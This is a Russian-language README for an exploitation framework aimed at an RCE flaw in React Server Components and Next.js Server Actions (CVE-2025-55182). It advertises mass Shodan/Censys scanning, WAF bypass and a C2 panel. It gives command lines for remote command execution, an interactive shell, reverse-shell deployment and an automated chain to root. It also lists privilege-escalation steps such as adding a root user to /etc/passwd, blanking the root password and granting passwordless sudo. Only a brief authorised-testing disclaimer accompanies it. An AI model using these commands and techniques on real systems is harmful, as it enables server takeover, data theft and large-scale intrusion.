Элитный набор инструментов для эксплуатации CVE-2025-55182 (RCE в серверных компонентах React). Асинхронные полиморфные полезные нагрузки, продвинутый обход WAF/CDN, ротация прокси, массовое сканирование Shodan/Censys, авто-pwn + обратные шеллы, шаблоны Nuclei, лаборатория K8s и панель управления C2. Автор: Sudeepa Wanigarathna – строго для авторизованного тестирования на проникновение и red team.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Профессиональный фреймворк для эксплуатации уязвимости RCE в Server Actions Next.js (React2Shell). Демонстрирует полную цепочку атаки от первоначального доступа до повышения привилегий до root.
Возможности:
# Проверка уязвимости
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Выполнение команды
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Полная эксплуатация: RCE → Перечисление → Доступ root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # Основной движок эксплойта (400+ строк)
├── demo_exploit.py # Автоматизированная цепочка атаки (290+ строк)
├── interactive_shell.py # Интерактивная оболочка (280+ строк)
├── reverse_shell_handler.py # Слушатель обратной оболочки (180+ строк)
├── post_exploit/
│ ├── linux_enum.py # Перечисление системы (330+ строк)
│ ├── priv_esc.py # Повышение привилегий (320+ строк)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # Полная документация по использованию
├── QUICKSTART.md # Краткий справочник
└── BANNER.txt
# Проверка уязвимости
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Выполнение команд
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Различные варианты полезных нагрузок
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# С обфускацией
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Запуск оболочки
python3 interactive_shell.py --target http://127.0.0.1:3000
# Доступные команды:
# - execute <cmd> : Выполнить команду оболочки
# - enum : Запустить полное перечисление
# - escalate : Попытка повышения привилегий
# - upload <local> <remote> : Загрузить файл
# - download <remote> <local>: Скачать файл
# - shell <lhost> <lport>: Развернуть обратную оболочку
# - info : Показать информацию о сессии
# - exit : Выйти
# Терминал 1: Запуск слушателя
python3 reverse_shell_handler.py --lport 4444
# Терминал 2: Развёртывание оболочки
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Полная цепочка: Обнаружение → RCE → Перечисление → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Фреймворк реализует полную цепочку эксплуатации из 6 шагов:
id/etc/shadow и просмотром /rootSUID-бинарники (GTFOBins)
Доступные для записи файлы /etc
/etc/passwd - Добавление нового пользователя root/etc/shadow - Очистка пароля root/etc/sudoers - Предоставление sudo без пароля (NOPASSWD)Побег из Docker
Эксплойты ядра
Linux Capabilities
pip install -r requirements.txt
Зависимости:
EXPLOITATION_GUIDE.md - Полное руководство по использованию с примерамиQUICKSTART.md - Краткий справочник по распространённым командамПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
Автор не несёт ответственности за любое неправомерное использование этого инструмента. Используйте на свой страх и риск.
Этот фреймворк предназначен для:
Лицензия MIT (только в образовательных целях)
Sudeepa Wanigarathna
Версия: 1.0
Последнее обновление: декабрь 2025
Подробные инструкции по использованию см. в EXPLOITATION_GUIDE.md